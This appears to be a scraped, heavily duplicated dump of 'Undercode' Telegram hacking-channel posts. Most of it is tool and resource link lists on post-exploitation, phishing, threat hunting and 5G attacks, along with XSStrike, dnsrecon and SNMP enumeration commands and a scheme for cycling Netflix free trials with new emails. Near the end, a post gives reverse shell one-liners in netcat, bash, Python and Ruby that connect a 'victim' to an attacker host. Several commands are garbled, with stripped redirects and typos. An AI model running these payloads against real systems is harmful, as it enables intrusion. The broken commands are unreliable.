▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Popular real hackers resources :
#Online resources
[Security related Operating Systems @ Rawsec](http://rawsec.ml/en/security-related-os/) - Complete list of security related operating systems
Best Linux Penetration Testing Distributions @ CyberPunk - Description of main penetration testing distributions
[Security @ Distrowatch](http://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing and keeping up to date with open source operating systems
# tools -exploitation :
empire - A post exploitation framework for powershell and python.
[silenttrinity](https://github.com/byt3bl33d3r/SILENTTRINITY) - A post exploitation tool that uses iron python to get past powershell restrictions.
ebowla - Framework for Making Environmental Keyed Payloads
# ETC
[SecTools](http://sectools.org/) - Top 125 Network Security Tools
Hopper's Roppers Security Training - Four free courses designed to teach beginners the fundamentals of computing, security, and CTFs.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑Popular real hackers resources :
#Online resources
[Security related Operating Systems @ Rawsec](http://rawsec.ml/en/security-related-os/) - Complete list of security related operating systems
Best Linux Penetration Testing Distributions @ CyberPunk - Description of main penetration testing distributions
[Security @ Distrowatch](http://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing and keeping up to date with open source operating systems
# tools -exploitation :
empire - A post exploitation framework for powershell and python.
[silenttrinity](https://github.com/byt3bl33d3r/SILENTTRINITY) - A post exploitation tool that uses iron python to get past powershell restrictions.
ebowla - Framework for Making Environmental Keyed Payloads
# ETC
[SecTools](http://sectools.org/) - Top 125 Network Security Tools
Hopper's Roppers Security Training - Four free courses designed to teach beginners the fundamentals of computing, security, and CTFs.
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Rawsec
Security related Operating Systems
The list of security related OS is now part of Rawsec's CyberSecurity Inventory!
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑There are two methods to legally watch Netflix for free:
1) The first thing we present is thanks to Together Price , a platform that helps share the cost of digital subscriptions multiaccounting like Netflix, Spotify, HBO etc. in a way easy, legal and safe .
2) It is a method of sharing (or sharing), have a network where owners of digital subscriptions made available free spaces that do not use their account, users who do not have an account but want to save pay a proportionate share of the service for it.
3) In this way, everyone wins, but the good news does not end here. The platform presents a promotion that allows you to enjoy Netflix "Free Forever" legally.
4) The procedure to enjoy this promotion is very easy, we explain step by step how to do it:
> Get the Premium subscription Netflix
> Register on the platform
> Create a group to share Netflix
> Complete the group
5) Keep the group to complete by 30 days
If you kept full for 30 days, Together Price reimburse part of the fee paid by the Administrator, and so you can enjoy all content on Netflix free forever .
6) Regarding the second method, before starting with the steps to follow , we recommend getting a paid subscription to support the creation of new content.
>Go to the Netflix website
>Click on " ENJOY A MONTH FOR FREE "
> Follow the steps indicated until you reach " Create account "
> Enter an email and password
>Choose the payment method that is most comfortable for you (don't worry, you won't be charged anything)
>Now you just have to go to " Your account " and deactivate " SUBSCRIPTION and BILLING "
> You will receive two emails, one confirming the registration on Netflix and the other canceling the automatic subscription where they indicate that we will still be able to continue enjoying our free month.
7)When the month passes we repeat the same operation with a different email , if we use the same email it will detect that we have already been customers and they will charge us for the entire month. The most advisable thing is to have a control of the emails used every month.
8) The only downside (to add one) is that being new accounts you will lose all your history of movies and favorite series every time you repeat the process. Every time you carry out the process you will be able to see the content on two different computers in high quality .
9) We insist that the method to consume Netflix for free every month is completely legal , we recommend that you subscribe to continue generating quality content
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑There are two methods to legally watch Netflix for free:
1) The first thing we present is thanks to Together Price , a platform that helps share the cost of digital subscriptions multiaccounting like Netflix, Spotify, HBO etc. in a way easy, legal and safe .
2) It is a method of sharing (or sharing), have a network where owners of digital subscriptions made available free spaces that do not use their account, users who do not have an account but want to save pay a proportionate share of the service for it.
3) In this way, everyone wins, but the good news does not end here. The platform presents a promotion that allows you to enjoy Netflix "Free Forever" legally.
4) The procedure to enjoy this promotion is very easy, we explain step by step how to do it:
> Get the Premium subscription Netflix
> Register on the platform
> Create a group to share Netflix
> Complete the group
5) Keep the group to complete by 30 days
If you kept full for 30 days, Together Price reimburse part of the fee paid by the Administrator, and so you can enjoy all content on Netflix free forever .
6) Regarding the second method, before starting with the steps to follow , we recommend getting a paid subscription to support the creation of new content.
>Go to the Netflix website
>Click on " ENJOY A MONTH FOR FREE "
> Follow the steps indicated until you reach " Create account "
> Enter an email and password
>Choose the payment method that is most comfortable for you (don't worry, you won't be charged anything)
>Now you just have to go to " Your account " and deactivate " SUBSCRIPTION and BILLING "
> You will receive two emails, one confirming the registration on Netflix and the other canceling the automatic subscription where they indicate that we will still be able to continue enjoying our free month.
7)When the month passes we repeat the same operation with a different email , if we use the same email it will detect that we have already been customers and they will charge us for the entire month. The most advisable thing is to have a control of the emails used every month.
8) The only downside (to add one) is that being new accounts you will lose all your history of movies and favorite series every time you repeat the process. Every time you carry out the process you will be able to see the content on two different computers in high quality .
9) We insist that the method to consume Netflix for free every month is completely legal , we recommend that you subscribe to continue generating quality content
YOU CAN ALSO GET A WORKING MOD APK NETFLIX PREMIUM COMPLETE MOD FROM @UNDERCODETESTING@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 HELPFULL BOTs For Telegram Users :
(from botListchat grp)
•🔎🌐Inline Web Search - Busqueda Web en línea
@ArcheWikiBot 🔎
@GoodReadsBooksBot
@GoogleDEBot 🔎
@GoogleSearchUnofficialBot 🔎
@GoogramBot 🔎
@HentaiDBot 🔎
@hotRedditBot 🔎
@inlinepixivbot
@inlineredditbot 🔎
@instant_utilities_bot
@itorrentsearchbot 🔎
@letmebot 🔎
@letmegbot 🔎
@lmddgtfybot 🔎
@NephoBot 🔎
@PHPFuncsBot 🔎
@PHPIndexBot 🔎
@podsearchbot 🔎
🆕 @ribot 🔎
@TorrentSearchRoBot 🔎
@TubeListBot 🔎
(from botListchat grp)
•🔎🌐Inline Web Search - Busqueda Web en línea
@ArcheWikiBot 🔎
@GoodReadsBooksBot
@GoogleDEBot 🔎
@GoogleSearchUnofficialBot 🔎
@GoogramBot 🔎
@HentaiDBot 🔎
@hotRedditBot 🔎
@inlinepixivbot
@inlineredditbot 🔎
@instant_utilities_bot
@itorrentsearchbot 🔎
@letmebot 🔎
@letmegbot 🔎
@lmddgtfybot 🔎
@NephoBot 🔎
@PHPFuncsBot 🔎
@PHPIndexBot 🔎
@podsearchbot 🔎
🆕 @ribot 🔎
@TorrentSearchRoBot 🔎
@TubeListBot 🔎
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
#Social Engineering
* [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit)
* [Social Engineer Portal](https://www.social-engineer.org/)
* [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411)
* [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf)
* [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)
* [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)
* [USB Drop Attacks: The Danger of “Lost And Found†Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-
and-found-thumb-drives/)
* [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing)
* [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/)
* [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
#Social Engineering
* [Social Engineering Toolkit](https://github.com/trustedsec/social-engineer-toolkit)
* [Social Engineer Portal](https://www.social-engineer.org/)
* [7 Best social Engineering attack](http://www.darkreading.com/the-7-best-social-engineering-attacks-ever/d/d-id/1319411)
* [Using Social Engineering Tactics For Big Data Espionage - RSA Conference Europe 2012](https://www.rsaconference.com/writable/presentations/file_upload/das-301_williams_rader.pdf)
* [Weaponizing data science for social engineering: Automated E2E spear phishing on Twitter - Defcon 23](https://media.defcon.org/DEF%20CON%2024/DEF%20CON%2024%20presentations/DEFCON-24-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-WP.pdf)
* [OWASP Presentation of Social Engineering - OWASP](https://www.owasp.org/images/5/54/Presentation_Social_Engineering.pdf)
* [USB Drop Attacks: The Danger of “Lost And Found†Thumb Drives](https://www.redteamsecure.com/usb-drop-attacks-the-danger-of-lost-
and-found-thumb-drives/)
* [PyPhishing Toolkit](https://github.com/redteamsecurity/PyPhishing)
* [Best Time to send email](https://coschedule.com/blog/best-time-to-send-email/)
* [Phishing on Twitter - POT](https://www.kitploit.com/2018/02/pot-phishing-on-twitter.html)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - trustedsec/social-engineer-toolkit: The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of…
The Social-Engineer Toolkit (SET) repository from TrustedSec - All new versions of SET will be deployed here. - trustedsec/social-engineer-toolkit
Forwarded from UNDERCODE SECURITY
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Threat Hunting Resources
# Platforms and Tools
- [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target.
- [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CK™) adversary model.
- [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.
- [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database.
- [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response.
- [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.
- [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing.
- [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques.
- [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework.
- [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API.
- [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity.
- [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting.
- [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module.
- [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics.
- [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros.
- [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API.
- [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies.
- [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).
- [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.
- [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf)
- [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting.
🦑#Threat Hunting Resources
# Platforms and Tools
- [MITRE ATT&CK](https://attack.mitre.org/wiki/Main_Page) - A curated knowledge base and model for cyber adversary behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target.
- [MITRE CAR](https://car.mitre.org/wiki/Main_Page) - The Cyber Analytics Repository (CAR) is a knowledge base of analytics developed by MITRE based on the Adversary Tactics, Techniques, and Common Knowledge (ATT&CK™) adversary model.
- [MITRE ATT&CK Navigator](https://mitre.github.io/attack-navigator/enterprise/)([source code](https://github.com/mitre/attack-navigator)) - The ATT&CK Navigator is designed to provide basic navigation and annotation of ATT&CK matrices, something that people are already doing today in tools like Excel.
- [HELK](https://github.com/Cyb3rWard0g/HELK) - A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
- [osquery](https://osquery.io/) - An operating system instrumentation framework for Windows, OS X (macOS), Linux, and FreeBSD. It exposes an operating system as a high-performance relational database.
- [osquery-configuration](https://github.com/palantir/osquery-configuration) - A repository for using osquery for incident detection and response.
- [DetectionLab](https://github.com/clong/DetectionLab/) - Vagrant & Packer scripts to build a lab environment complete with security tooling and logging best practices.
- [Sysmon-DFIR](https://github.com/MHaggis/sysmon-dfir) - Sources, configuration and how to detect evil things utilizing Microsoft Sysmon.
- [sysmon-config](https://github.com/SwiftOnSecurity/sysmon-config) - Sysmon configuration file template with default high-quality event tracing.
- [sysmon-modular](https://github.com/olafhartong/sysmon-modular) - A repository of sysmon configuration modules. It also includes a [mapping](https://github.com/olafhartong/sysmon-modular/blob/master/attack_matrix/README.md) of Sysmon configurations to MITRE ATT&CK techniques.
- [Revoke-Obfuscation](https://github.com/danielbohannon/Revoke-Obfuscation) - PowerShell Obfuscation Detection Framework.
- [Invoke-ATTACKAPI](https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI) - A PowerShell script to interact with the MITRE ATT&CK Framework via its own API.
- [Unfetter](https://github.com/unfetter-analytic/unfetter) - A reference implementation provides a framework for collecting events (process creation, network connections, Window Event Logs, etc.) from a client machine and performing CAR analytics to detect potential adversary activity.
- [NOAH](https://github.com/giMini/NOAH) - PowerShell No Agent Hunting.
- [PSHunt](https://github.com/Infocyte/PSHunt) - Powershell Threat Hunting Module.
- [Flare](https://github.com/austin-taylor/flare) - An analytical framework for network traffic and behavioral analytics.
- [go-audit](https://github.com/slackhq/go-audit) - An alternative to the auditd daemon that ships with many distros.
- [sqhunter](https://github.com/0x4D31/sqhunter) - A simple threat hunting tool based on osquery, Salt Open and Cymon API.
- [Alerting and Detection Strategies Framework](https://github.com/palantir/alerting-detection-strategy-framework) - A framework for developing alerting and detection strategies.
- [A Simple Hunting Maturity Model](http://detect-respond.blogspot.com.au/2015/10/a-simple-hunting-maturity-model.html) - The Hunting Maturity Model describes five levels of organizational hunting capability, ranging from HMM0 (the least capability) to HMM4 (the most).
- [The Pyramic of Pain](http://detect-respond.blogspot.com.au/2013/03/the-pyramid-of-pain.html) - The relationship between the types of indicators you might use to detect an adversary's activities and how much pain it will cause them when you are able to deny those indicators to them.
- [A Framework for Cyber Threat Hunting](http://sqrrl.com/media/Framework-for-Threat-Hunting-Whitepaper.pdf)
- [The PARIS Model](http://threathunter.guru/blog/the-paris-model/) - A model for threat hunting.
MITRE Cyber Analytics Repository
Welcome to the Cyber Analytics Repository
Forwarded from UNDERCODE SECURITY
- [Cyber Kill Chain](https://www.lockheedmartin.com/us/what-we-do/aerospace-defense/cyber/cyber-kill-chain.html) - It is part of the Intelligence Driven Defense® model for identification and prevention of cyber intrusions activity. The model identifies what the adversaries must complete in order to achieve their objective.
- [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.
- [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
- [The DML Model](http://ryanstillions.blogspot.com.au/2014/04/the-dml-model_21.html) - The Detection Maturity Level (DML) model is a capability maturity model for referencing ones maturity in detecting cyber attacks.
- [Endgame Hunt Cycle](http://pages.endgame.com/rs/627-YBU-612/images/Endgame%20Hunt%20Methodology%20POV%203.24.16.pdf)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [Sigma](https://github.com/Neo23x0/sigma) - Generic Signature Format for SIEM Systems
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
Lockheed Martin
Cyber Kill Chain®
Lockheed Martin's Cyber Kill Chain® strengthens cybersecurity. Prevent cyber intrusions with our Intelligence Driven Defense® model.
Forwarded from UNDERCODE SECURITY
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
🦑Os :
> debians (kali-parrot-ubuntu...)
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/s0md3v/XSStrike
2️⃣cd XSStrike
2️⃣python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4️⃣Scan a single URL
Option: -u or --url
5️⃣Test a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6️⃣Supplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7️⃣Testing URL path components
Option: --path
8️⃣Want to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9️⃣Treat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
🔟Crawling
Option: --crawl
For more type -h
✅
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑 Most advanced XSS scanner 8k stars :
FEATURES :
Reflected and DOM XSS scanning
Multi-threaded crawling
Context analysis
Configurable core
WAF detection & evasion
Outdated JS lib scanning
Intelligent payload generator
Handmade HTML & JavaScript parser
Powerful fuzzing engine
Blind XSS support
Highly researched work-flow
Complete HTTP support
Bruteforce payloads from a file
Powered by Photon, Zetanize and Arjun
Payload Encoding
🦑Os :
> debians (kali-parrot-ubuntu...)
🄸🄽🅂🅃🄰🄻🄻🄸🅂🄰🅃🄸🄾🄽 & 🅁🅄🄽 :
1️⃣git clone https://github.com/s0md3v/XSStrike
2️⃣cd XSStrike
2️⃣python xsstrike.py [-h] [-u TARGET] [--data DATA] [-t THREADS] [--seeds SEEDS] [--json] [--path]
[--fuzzer] [--update] [--timeout] [--params] [--crawl] [--blind]
[--skip-dom] [--headers] [--proxy] [-d DELAY] [-e ENCODING]
MORE USAGES :
4️⃣Scan a single URL
Option: -u or --url
5️⃣Test a single webpage which uses GET method.
python xsstrike.py -u "http://example.com/search.php?q=query"
6️⃣Supplying POST data
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
7️⃣Testing URL path components
Option: --path
8️⃣Want to inject payloads in the URL path like http://example.com/search/<payload>, you can do that with --path switch.
python xsstrike.py -u "http://example.com/search/form/query" --path
9️⃣Treat POST data as JSON
Option: --json
This switch can be used to test JSON data via POST method.
python xsstrike.py -u "http://example.com/search.php" --data '{"q":"query"} --json'
🔟Crawling
Option: --crawl
For more type -h
✅
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - s0md3v/XSStrike: Most advanced XSS scanner.
Most advanced XSS scanner. Contribute to s0md3v/XSStrike development by creating an account on GitHub.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#5G Cellular Attacks
- [ENISA THREAT LANDSCAPE FOR 5G NETWORKS](https://github.com/W00t3k/Awesome-CellularHacking/blob/master/ENISA%20threat%20landscape%20for%205G%20Networks.pdf)
- [Protecting the 4G and 5G Cellular PagingProtocols against Security and Privacy Attacks](https://www.degruyter.com/downloadpdf/j/popets.2020.2020.issue-1/popets-2020-0008/popets-2020-0008.pdf)
- [Insecure Connection Bootstrapping in Cellular Networks: The Root of All Evil](https://relentless-warrior.github.io/wp-content/uploads/2019/05/wisec19-preprint.pdf)
- [5GReasoner: A Property-Directed Security and Privacy Analysis Framework for 5G Cellular Network Protocol](https://relentless-warrior.github.io/wp-content/uploads/2019/10/5GReasoner.pdf)
- [QCSniper - A tool For capture 2g-4g air traffic using qualcomm phones ](https://labs.p1sec.com/2019/07/09/presenting-qcsuper-a-tool-for-capturing-your-2g-3g-4g-air-traffic-on-qualcomm-based-phones/)
- [Privacy Attacks to the 4G and 5G Cellular Paging Protocols Using Side Channel Information](http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE-torpedo-NDSS19.pdf)
- [New Privacy Threat on 3G, 4G, and Upcoming 5G AKA Protocols ](https://arxiv.org/pdf/1905.07617.pdf)
- [New Vulnerabilities in 5G Networks](https://threatpost.com/5g-security-flaw-mitm-targeted-attacks/147073/)
- [Side Channel Analysis in 4G and 5G Cellular Networks](https://i.blackhat.com/eu-19/Thursday/eu-19-Hussain-Side-Channel-Attacks-In-4G-And-5G-Cellular-Networks.pdf)
- [5G NR Jamming, Spoofing, and Sniffing](https://github.com/W00t3k/Awesome-Cellular-Hacking/blob/master/5gjam.pdf)
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
De Gruyter
Independent academic publisher dedicated to high-caliber scholarship from around the world – since 1749.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#DNS Reconnassaince :
1️⃣DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2️⃣Reverse lookup for IP range:
>
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#DNS Reconnassaince :
1️⃣DNSRECON
* [dnsrecon](https://github.com/darkoperator/dnsrecon) - DNS Enumeration Script created by Carlos Perez (darkoperator)
2️⃣Reverse lookup for IP range:
./dnsrecon.rb -t rvs -i 10.1.1.1,10.1.1.50
3️⃣Retrieve standard DNS records:./dnsrecon.rb -t std -d example.com
4️⃣Enumerate subdornains:./dnsrecon.rb -t brt -d example.com -w hosts.txt
5️⃣DNS zone transfer:./dnsrecon -d example.com -t axfr
6️⃣Parsing NMAP Reverse DNS Lookup>
nmap -R -sL -Pn -dns-servers dns svr ip range | awk '{if( ($1" "$2" "$3)=="NMAP scan report")print$5" "$6}' | sed 's/(//g' | sed 's/)//g' dns.txt
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
GitHub
GitHub - darkoperator/dnsrecon: DNS Enumeration Script
DNS Enumeration Script. Contribute to darkoperator/dnsrecon development by creating an account on GitHub.
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Netcat Linux Reverse Shell :
1️⃣
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2️⃣ Netcat Linux Reverse Shell
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3️⃣ Using Bash
5️⃣ Using Ruby
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
🦑#Netcat Linux Reverse Shell :
1️⃣
nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
2️⃣ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).
3️⃣ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1
4️⃣ Using Pythonpython -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);' 5️⃣ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'
@UndercodeTesting@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
#Useful SNMP Commands
1️⃣Search for Windows installed software
▁ ▂ ▄ u𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁
#Useful SNMP Commands
1️⃣Search for Windows installed software
smpwalk !grep hrSWinstalledName
2️⃣ Search for Windows userssnmpwalk ip 1.3 lgrep --.1.2.25 -f4
3️⃣ Search for Windows running servicessnrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4
4️⃣ Search for Windows open TCP portssmpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u
